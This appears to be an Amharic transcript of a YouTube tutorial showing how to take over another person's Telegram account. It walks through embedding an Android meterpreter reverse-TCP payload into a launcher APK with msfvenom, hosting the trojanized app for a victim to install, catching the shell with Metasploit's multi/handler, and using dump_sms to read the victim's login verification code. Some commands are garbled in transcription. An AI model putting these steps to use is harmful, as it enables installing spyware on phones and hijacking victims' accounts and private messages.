ሰላም ጋይስ እንዴት ናችሁ? ዛሬ ይዤላችሁ የመጣው ቪዲዮ ቴሌግራም ላይ እንዳልኳችሁ የቴሌግራም አካውንት እንዴት አድርገን ሃክ እንደምናደርግ ነው። የአንድ ሰው አካውንት ሃክ እንዴት እንደምናደርግ ነው። ሶ ቪዲዮውን ላይክ በማድረግ እንጀምር። እንደዚህ አይነት ቪዲዮ እንዳይመጣችሁ ካልፈለጋችሁ ሰብስክራይብ ማድረግ እንዳይረሱ። አሁን ወደ ቪዲዮ እንግባ። በመጀመሪያ meterpreter embed የምናደርግበትን አፕሊኬሽን እናወርዳለን። ሶ ፋየርፎክስ ከፍትና apktool ብዬ ሰርች አደርጋለሁ። ከዛ ላይ እናወርዳለን ማለት ነው። ሶ እዚህ ጋር ሰርች ባሩ ላይ እንሄድና Google Now Launcher የምትለዋን እናወርዳታለን። ከዚህ በፊት እንደዚህ አይነት ቪዲዮ ሰርች ነበረ። በደንብ የሚያብራራ ቪዲዮ ከፈለጋችሁ ሊንኩ ዲስክሪፕሽን ላይ አስቀምጥላችኋለሁ። ሶ እቺኛዋን እናወርዳታለን ከላይ ያለችውን ጆርዳን available downloads ከዛ ነው ሁለት አለ ከላይ ያለው እናወርደዋለን እኛ ጆርዳን እዚጋ ዳውንሎድ አፕ የምትለዋን 8 ሜጋባይት ነው ፋይሉ ሶ እናወርደዋለን። ከዛ ሴቭ ፋይል ላይ አድርገን ኦኬ እንላለን ማለት ነው። ከዛ እዚህ ጋር ዳውንሎድ እያደረገ ነው ፋይሉን ማለት ነው። ዳውንሎድ ከጨረሰ በኋላ ፋየርፎክሳችንን እንዘጋዋለን። ክሎዝ ታብ ስንለውና ተርሚናል እንከፍታለን። አሁን ተርሚናላችን ላይ ያወረንበት ዳይሬክተሪ ውስጥ እንገባለን ማለት ነው። ከዛ ዳውንሎድ ውስጥ ገብተን ls እንዳለን ከዛ እንደምታዩት ፋይሉ እዚህ ጋር አለ። ከዛ ስሙን እንቀይረዋለን mbን ተጠቅመን እዚህ ጋር በታብ ከዛ google_launcher apt-get ይለዋለሁ ማለት ነው። ls ስንል እዚህ ጋር Google Launcher apk የምትላለች አሁን meterpreter embed እናደርግበታለን። sudo msfvenom tag x google launcher.apk የአፕሊኬሽኑን ስም ከዛ tag p የፔሎዱ ምን አይነት ነው android meterpreter and reverse tcp lhostaችንን አስተካክላለን ኢኳል ቱ አልተን 192.168.1 ከዛ ሄደን እናያለን ማለት ነው። ipconfig ብለን ከዛ እዚህ ጋር እንደምታዩት 18 ነው ሶ 8 አደርጋለሁ ሶሪ .8 ከዛ lportaችንን እናስተካክላለን 444 እንጠቀማለን ከዚህ በፊት እንዳሳየዋችሁ። ከዛ ታግ o አርግተን የመቀየር ከፈለግን ስሙን Google Now Launcher ብዬ ቀይረዋለሁ ማለት ነው። ከዛ .apk ማድረግ እንዳንረሳ ከዛ ኢንተር እንነካለን። sudo ፓስወርድ እናስገባለን። ከዛ አሁን ይሄ meterpreter ኢንጀክት እያደረገልን ነው Google Now Launcher የሚለው አፕሊኬሽን ውስጥ ሰው እስካሁን ሞክሬ በዚህ አፕሊኬሽን ብቻ ነው የሚሰራ። በሌላ አፕሊኬሽን የሚሰራ ካገኙ አሳውቃችኋለሁ። ሰው ፕሮሰሱን ጨርሷል። ሶ እዚህ ጋር እንደምናየው ሴቭ አድርጎልናል Google Now Launcher የሚል አፕሊኬሽን። ከዛ ls አድርገን ስናይ እዚህ ጋር Google Now Launcher የምትል አፕሊኬሽን አለ apk ፋይል አለ ማለት ነው። ከዛ አሁን ይሄንን ነው የምናደርገው ወደ ሰርቨራችን ላይ ሆስት እናደርገዋለን። ሶ ሰርቨራችንን መጀመሪያ አፕ እናድርግ ማለት ነው። sudo systemctl start apt-get.service እንለዋለን። ከዛ ኢንተር እንነካለን። ከዛ ሰርቨራችን አፕ ሆኗል። አሁን ኮፒ እናደርገዋለን ማለት ነው። ከዛ የአፕሊኬሽኑን ስም ከዛ // አድርገን bar/www/html/ አድርገን ኢንተር እንነካለን። ከዛ አፕሊኬሽኑን ሆስት አድርገናል ማለት ነው በሰርቨራችን ላይ። ከዛ ስልኬን ከፍቼ ላሳያችሁ እዚህ ጋር 192.168.1.8/ የአፕሊኬሽኑን ስም ማለት ነው Google Now Launcher launcher.apk ማድረግ እንዳረሳ። ከዛ ኢንተር ስንነካ ዳውንሎድ ማድረግ ይጀምራል ማለት ነው። ከዛ እዚህ ዲቴይል ውስጥ ስንገባ ዳውንሎድ እያደረገ ነው። ዳውንሎድ ጨርሷል። ከዛ አፕሊኬሽኑን ኢንስቶል እናደርጋለን። ፕሌይ ስቶር እንትን ያደርጋል። ኢንስቶል anyway እንለዋለን። አሁን ኢንስቶል እንለዋለን። ከዛ አሁን እዚህ ጋር እንደምናየው ጨርሷል ኢንስቶል አድርጎ
ወደ ተርሚናላችን እንሄድና ሜታስፕሎይትን ረን እናደርጋለን ማለት ነው። ሶ msfconsole እና ሜታስፕሎይታችን አፕ ከሆነ በኋላ እዚህ ጋር እንደምናየው ሎጊን የምናደርግበት ቴሌግራም አፕሊኬሽን አለ። እዛ ውስጥ ነው በዚህኛው ስልክ ላይ ነው ሎጊን የምናደርገው። ሶ ሃክ የምናደርገው ስልክ መሃል ላይ ያለው ነው ማለት ነው። use exploit /multi/handler ማለት እዛ ኢንተር ነካለን። ከዚህ ጋር ጀነሪክ ሼል ይላል። ጀነሪክ ሼል ስለማንጠቀም ሴት payload android/meterpreter /reverse tcp እናደርግና ኢንተር ነካለን። ከዛ ኦፕሽንስ እንለውና lhost-አችንን እናስተካክላለን። ከዛ lhost-አችን ባዶ ነው። ስለዚህ set lhost 192.168 እንልና ኢንተር ነካለን። ከዛ ኦፕሽንስ ከዛ እንደምናየው ተስተካክሏል። ሶ ኤክስፕሎይት እንለውና ረን እናደርጋለን። ከዛ ስታርቲንግ ሪቨርስ ቲሲፒ ይለናል። ከዛ እዚህ ጋር ሄደን አፕሊኬሽኑን ኦፕን እንለዋለን ማለት ነው። ሴንዲንግ ስቴጅ ብሎ ይሰጠናል። ከዛ ሜተርፕሪተራችንን አግኝተናል። ሶ እዚህ ጋር ሄልፕ ብለን እና ሙሉ ሊስቱን እናገኛለን። ሶ አሁን እኛ ምንድን ነው የምናደርገው? ሎጊን የምናደርግበት ስልክ ላይ እንሄድና ስልክ ቁጥሩን እንጽፋለን ማለት ነው። ሶ ስልክ ቁጥሩን ከጻፍን በኋላ ኔክስት እንለዋለን። ከዛ እዚህኛው ስልክ ላይ ቬሪፊኬሽን ኮድ ይገባል ማለት ነው። ሶ እኛ አሁን ይሄን ቬሪፊኬሽን ኮድ ነው የምናገኘው ማለት ነው በኤን ሜተርፕሪተር ተጠቅመን። ሶ እዚህ ጋር እንደምታዩት አለ ቴሌግራም ሚል። ሶ አሁን ዳምፕ ኤስኤምኤስ እንለዋለን ማለት ነው። dump_sms እንለውና ኢንተር ነካለን። ከዛ እዚህ ጋር በፋይል ሴቭ ያደርግልናል። ሶ ይሄንን ፋይል ሄደን ዳይሬክተሪ ውስጥ ሄደን እንፈልገዋለን ማለት ነው። ከዛ ሌላ ተርሚናል እንከፍትና ሲዲ ዳውንሎድስ ውስጥ እኔ ዳውንሎድስ ውስጥ ነው ሴቭ የሚያደርገው። ዳውንሎድስ ውስጥ ገባና አየዋለሁ። ኤልኤስ እንለውና እዚህ ጋር እንደምታዩት ኤስኤምኤስ ዳምፕ የሚል አለ። ቴክስት ፋይል ነው። ሶ ካት እንለዋለን ማለት ነው። ካት ከዛ ኤስኤምኤስ ፋይሉን ኮፒ እናደርግና ፔስት እንለዋለን። እዛ ጋር ሰሌክት ስላደረግነው ፔስት ሰሌክሽን እንለዋለን ማለት ነው። ከዛ ኢንተር እንነካለን። ከዛ እንደምናየው ስልኩ ላይ ያሉ ኤስኤምኤሶች መጥቶልናል ማለት ነው። ሶ እኛ ወደ ላይ እንሄድና የመጀመሪያ አሁን የገባው ላይ ስለሚቀመጥ ወደ ላይ እንወጣና እዚህ ጋር እንደምናየው ቴሌግራም ይላል። ሶ እዚህ ጋር ቴሌግራም እና ቬሪፊኬሽን ኮዱ ሶ ይሄንን ነው የምናስገባው ማለት ነው። እዚህ ውስጥ እናስገባለን ማለት ነው ቬሪፊኬሽን ኮዱ። ስልኩ ቁጥሬን ብለር ያደረኩት ለፕራይቬሲ ብዬ ነው። አሁን ኔክስት እንለውና ኮንታክት ነው አልፈልግም። ስለዚህ እንደምናየው እዚህ ጋር የኛውን ቴሌግራም አካውንት ሃክ አድርገናል ወይም ሎጊን አድርገንበታል። ቪዲዮ ከተመቻችሁ ላይክ፣ ሀሳብ አስተያየት ካላችሁ ኮሜንት ላይ አሳውቁኝ። እንደዚህ አይነት ቪዲዮዎች እንዳመጣችሁ ካልፈለጋችሁ ሰብስክራይብ በማድረግ ቻናላችንን ይቀላቀሉ። በቀጣይ ቪዲዮ እስከምንገናኝ ድረስ ቻው፣ ይመቻችሁ።